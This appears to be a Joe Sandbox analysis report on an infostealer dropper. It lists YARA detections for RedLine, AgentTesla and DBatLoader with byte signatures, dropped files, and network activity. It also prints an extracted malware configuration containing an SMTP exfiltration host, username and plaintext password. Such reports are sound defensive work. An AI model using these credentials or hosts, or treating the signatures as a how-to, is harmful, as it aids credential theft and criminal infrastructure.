8.1.srcngmlC.pif.400000.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 C7 88 44 24 2B 88 44 24 2F B0 A5 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
8.2.srcngmlC.pif.32f65b90.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.srcngmlC.pif.32f65b90.6.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
8.2.srcngmlC.pif.32f65b90.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x419cd:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x41a3f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x41ac9:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x41b5b:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x41bc5:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x41c37:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x41ccd:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x41d5d:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
5.2.srcngmlC.pif.31c60fae.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.srcngmlC.pif.31c60fae.5.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.srcngmlC.pif.31c60fae.5.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3fbcd:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3fc3f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3fcc9:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3fd5b:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3fdc5:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3fe37:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3fecd:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3ff5d:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
5.2.srcngmlC.pif.31c60fae.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.srcngmlC.pif.31c60fae.5.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.srcngmlC.pif.31c60fae.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x419cd:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x41a3f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x41ac9:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x41b5b:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x41bc5:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x41c37:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x41ccd:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x41d5d:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
5.2.srcngmlC.pif.400000.2.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
5.2.srcngmlC.pif.400000.2.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C7 88 44 24 2B 88 44 24 2F B0 A5 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
8.2.srcngmlC.pif.31bd00c6.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.srcngmlC.pif.31bd00c6.4.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
8.2.srcngmlC.pif.31bd00c6.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x428b5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x42927:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x429b1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x42a43:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x42aad:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x42b1f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x42bb5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x42c45:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
5.1.srcngmlC.pif.400000.2.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
5.1.srcngmlC.pif.400000.2.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C7 88 44 24 2B 88 44 24 2F B0 A5 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
5.2.srcngmlC.pif.344a0000.8.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.srcngmlC.pif.344a0000.8.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.srcngmlC.pif.344a0000.8.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x40ab5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x40b27:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x40bb1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x40c43:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x40cad:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x40d1f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x40db5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x40e45:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
12.2.srcngmlC.pif.409b0000.9.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.srcngmlC.pif.409b0000.9.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
12.2.srcngmlC.pif.409b0000.9.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3fbcd:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3fc3f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3fcc9:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3fd5b:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3fdc5:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3fe37:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3fecd:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3ff5d:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
12.2.srcngmlC.pif.3dce0000.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.srcngmlC.pif.3dce0000.6.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
12.2.srcngmlC.pif.3dce0000.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x428b5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x42927:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x429b1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x42a43:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x42aad:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x42b1f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x42bb5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x42c45:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
12.1.srcngmlC.pif.400000.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
12.1.srcngmlC.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 C7 88 44 24 2B 88 44 24 2F B0 A5 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
12.2.srcngmlC.pif.3da100c6.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.srcngmlC.pif.3da100c6.5.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
12.2.srcngmlC.pif.3da100c6.5.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x40ab5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x40b27:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x40bb1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x40c43:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x40cad:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x40d1f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x40db5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x40e45:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
8.2.srcngmlC.pif.31bd0fae.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.srcngmlC.pif.31bd0fae.5.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
8.2.srcngmlC.pif.31bd0fae.5.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3fbcd:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3fc3f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3fcc9:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3fd5b:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3fdc5:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3fe37:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3fecd:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3ff5d:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
12.2.srcngmlC.pif.3da10fae.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.srcngmlC.pif.3da10fae.4.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
12.2.srcngmlC.pif.3da10fae.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x419cd:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x41a3f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x41ac9:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x41b5b:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x41bc5:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x41c37:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x41ccd:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x41d5d:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
8.2.srcngmlC.pif.400000.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
8.2.srcngmlC.pif.400000.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C7 88 44 24 2B 88 44 24 2F B0 A5 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
5.2.srcngmlC.pif.31c600c6.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.srcngmlC.pif.31c600c6.4.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.srcngmlC.pif.31c600c6.4.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x40ab5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x40b27:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x40bb1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x40c43:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x40cad:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x40d1f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x40db5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x40e45:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
8.2.srcngmlC.pif.31bd00c6.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.srcngmlC.pif.31bd00c6.4.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
8.2.srcngmlC.pif.31bd00c6.4.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x40ab5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x40b27:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x40bb1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x40c43:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x40cad:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x40d1f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x40db5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x40e45:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
12.2.srcngmlC.pif.3dce0000.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.srcngmlC.pif.3dce0000.6.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
12.2.srcngmlC.pif.3dce0000.6.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x40ab5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x40b27:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x40bb1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x40c43:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x40cad:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x40d1f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x40db5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x40e45:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
8.2.srcngmlC.pif.34b10000.9.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.srcngmlC.pif.34b10000.9.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
8.2.srcngmlC.pif.34b10000.9.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3fbcd:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3fc3f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3fcc9:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3fd5b:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3fdc5:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3fe37:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3fecd:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3ff5d:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
5.2.srcngmlC.pif.34c10000.9.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.srcngmlC.pif.34c10000.9.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.srcngmlC.pif.34c10000.9.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3fbcd:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3fc3f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3fcc9:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3fd5b:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3fdc5:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3fe37:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3fecd:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3ff5d:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe.29d0000.1.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
Click to see the 128 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://oripam.xyz	Avira URL Cloud: Label: malware
Source: http://mail.oripam.xyz	Avira URL Cloud: Label: malware

Found malware configuration

Source: 5.2.srcngmlC.pif.32f55b90.6.raw.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.oripam.xyz", "Username": "101@oripam.xyz", "Password": "231Father@"}

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Libraries\Clmgncrs.PIF	ReversingLabs: Detection: 52%
Source: C:\Users\Public\Libraries\netutils.dll	ReversingLabs: Detection: 70%

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe

ReversingLabs: Detection: 52%

Machine Learning detection for dropped file

Source: C:\Users\Public\Libraries\netutils.dll	Joe Sandbox ML: detected
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe

Joe Sandbox ML: detected

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\Libraries\srcngmlC.pif	Unpacked PE file: 5.2.srcngmlC.pif.400000.2.unpack
Source: C:\Users\Public\Libraries\srcngmlC.pif	Unpacked PE file: 8.2.srcngmlC.pif.400000.1.unpack
Source: C:\Users\Public\Libraries\srcngmlC.pif	Unpacked PE file: 12.2.srcngmlC.pif.400000.3.unpack

Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 173.231.16.75:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 173.231.16.75:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 173.231.16.75:443 -> 192.168.2.4:49750 version: TLS 1.2

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.dr
Source:	Binary string: easinvoker.pdb source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, easinvoker.exe.0.dr
Source:	Binary string: _.pdb source: srcngmlC.pif, 00000005.00000003.1685796375.00000000301E0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877516776.0000000031C20000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879252508.00000000344A0000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879002850.0000000032F01000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942020419.0000000031B90000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1943713864.0000000034490000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1943376162.0000000032F15000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000003.1836003018.000000002FFFE000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933159398.000000003DCE0000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2932432191.000000003D9D0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000003.1906356857.000000003BEB0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2934529296.000000003EE61000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbH source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, easinvoker.exe.0.dr

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe

Code function: 0_2_029D5C18 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

0_2_029D5C18

Networking

Performs DNS queries to domains with low reputation

Source:

DNS query: mail.oripam.xyz

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe

Code function: 0_2_02A2BB38 InternetCheckConnectionA,

0_2_02A2BB38

Source: global traffic

TCP traffic: 192.168.2.4:49733 -> 185.56.136.50:587

